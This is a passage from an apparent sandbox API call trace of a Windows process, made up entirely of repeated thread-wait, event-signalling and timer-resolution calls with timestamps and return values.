(Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.105] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.123] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.136] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.136] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.138] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.138] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.188] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.218] SetEvent (hEvent=0x184) returned 1 [0315.218] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.312] SetEvent (hEvent=0x14c) returned 1 [0315.312] SetEvent (hEvent=0x190) returned 1 [0315.312] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.317] SetEvent (hEvent=0x14c) returned 1 [0315.317] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.346] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.346] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.349] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.349] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.360] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.364] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.365] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.375] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.375] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.407] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.407] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.410] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.411] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.413] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.413] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.420] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.420] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.430] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.430] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.437] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.437] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.469] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.472] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.478] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.478] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.574] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.574] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.591] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.591] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.600] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.601] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.601] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.603] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.603] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.617] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.617] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.620] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.620] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.675] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.684] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.684] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.685] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.685] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.691] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.691] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.719] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.719] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.725] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.725] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.726] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.726] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.731] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.761] SetEvent (hEvent=0x220) returned 1 [0315.761] SetEvent (hEvent=0x1dc) returned 1 [0315.761] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.792] SetEvent (hEvent=0x220) returned 1 [0315.792] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.796] SetEvent (hEvent=0x220) returned 1 [0315.796] SetEvent (hEvent=0x214) returned 1 [0315.796] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.810] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.811] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.858] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.859] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.868] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.868] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.890] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.890] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.919] SetEvent (hEvent=0x1b8) returned 1 [0315.919] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.929] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.930] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.937] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.937] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.942] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.950] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.950] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0315.961] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0315.961] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0315.996] timeEndPeriod (uPeriod=0x1) returned 0x0 [0315.996] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.025] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.025] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.029] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.029] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.034] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.034] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.064] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.117] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.122] SetEvent (hEvent=0x20c) returned 1 [0316.122] SetEvent (hEvent=0x1e8) returned 1 [0316.122] SetEvent (hEvent=0x22c) returned 1 [0316.122] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.127] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.156] SetEvent (hEvent=0x22c) returned 1 [0316.156] SetEvent (hEvent=0x20c) returned 1 [0316.156] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.199] SetEvent (hEvent=0x190) returned 1 [0316.199] SetEvent (hEvent=0x184) returned 1 [0316.199] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.234] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.235] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.332] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.332] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.376] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.384] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.384] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.429] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.430] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.507] SetEvent (hEvent=0x198) returned 1 [0316.507] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.510] SetEvent (hEvent=0x198) returned 1 [0316.510] SetEvent (hEvent=0x1b8) returned 1 [0316.510] SetEvent (hEvent=0x190) returned 1 [0316.510] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.514] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.528] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.529] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.544] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.545] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.556] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.556] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.566] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.566] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.625] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.625] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.630] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.630] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.636] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.636] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.647] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.647] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.649] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.692] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.751] SetEvent (hEvent=0x14c) returned 1 [0316.751] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.792] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.808] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.809] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.899] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.899] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.919] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.954] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0316.979] timeEndPeriod (uPeriod=0x1) returned 0x0 [0316.979] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0316.985] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0316.985] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.005] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.005] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.012] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.012] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.053] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.059] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.059] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.131] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.132] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.164] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.180] SetEvent (hEvent=0x20c) returned 1 [0317.180] SetEvent (hEvent=0x134) returned 1 [0317.180] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.189] SetEvent (hEvent=0x1ac) returned 1 [0317.189] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.200] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.255] SetEvent (hEvent=0x134) returned 1 [0317.255] SetEvent (hEvent=0x220) returned 1 [0317.255] SetEvent (hEvent=0x12c) returned 1 [0317.255] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.326] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.326] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.336] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.336] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.387] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.387] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.391] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.392] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.396] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.402] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.437] SetEvent (hEvent=0x20c) returned 1 [0317.437] SetEvent (hEvent=0x1e8) returned 1 [0317.437] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.441] SetEvent (hEvent=0x20c) returned 1 [0317.441] SetEvent (hEvent=0x1b8) returned 1 [0317.441] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.507] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.507] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.512] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.512] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.543] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.549] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.549] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.552] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.552] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.558] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.579] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.579] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.596] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.596] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.598] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.598] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.610] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.610] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.614] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.617] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.617] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.618] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.618] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.646] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.654] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.654] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.657] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.657] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.720] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.723] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.723] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.725] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.725] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.729] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.729] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.732] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.732] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.801] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.804] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.804] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.811] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.811] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.816] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.832] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.832] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.834] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.835] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.870] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.880] SetEvent (hEvent=0x20c) returned 1 [0317.880] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.890] SetEvent (hEvent=0x20c) returned 1 [0317.890] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.928] SetEvent (hEvent=0x20c) returned 1 [0317.928] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.962] timeEndPeriod (uPeriod=0x1) returned 0x0 [0317.962] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0317.987] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0317.987] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0317.992] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.051] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.051] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.076] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.077] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.221] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.221] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.250] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.250] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.253] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.255] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.257] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.258] SetEvent (hEvent=0x184) returned 1 [0318.258] SetEvent (hEvent=0x1b8) returned 1 [0318.258] SetEvent (hEvent=0x1dc) returned 1 [0318.258] SetEvent (hEvent=0x104) returned 1 [0318.258] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.302] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.303] SetEvent (hEvent=0x104) returned 1 [0318.303] SetEvent (hEvent=0x1dc) returned 1 [0318.303] SetEvent (hEvent=0x1b8) returned 1 [0318.303] SetEvent (hEvent=0x21c) returned 1 [0318.303] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.305] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.307] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.310] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.313] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.314] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.315] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.316] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.318] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.319] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.319] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.436] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.436] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.466] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.473] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.497] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.497] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.502] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.502] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.505] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.508] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.529] SetEvent (hEvent=0x1dc) returned 1 [0318.529] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.534] SetEvent (hEvent=0x1dc) returned 1 [0318.534] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.540] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.543] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.566] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.566] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.577] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.578] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.593] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.593] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.605] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.606] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.620] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.626] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.626] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.632] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.632] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.654] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.656] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.656] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.657] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.657] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.660] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.660] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.678] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.678] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.682] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.691] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.692] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.692] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.692] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.731] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.731] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.733] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.733] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.737] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.741] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.741] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.742] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.742] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.755] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.755] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.764] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.764] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.805] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.805] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.810] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.810] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.854] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.855] SetEvent (hEvent=0x21c) returned 1 [0318.855] SetEvent (hEvent=0x1ac) returned 1 [0318.855] SetEvent (hEvent=0x220) returned 1 [0318.855] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.873] timeEndPeriod (uPeriod=0x1) returned 0x0 [0318.873] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0318.894] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0318.894] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0318.897] NtWaitForSingleObject (Object=0xffffffff, 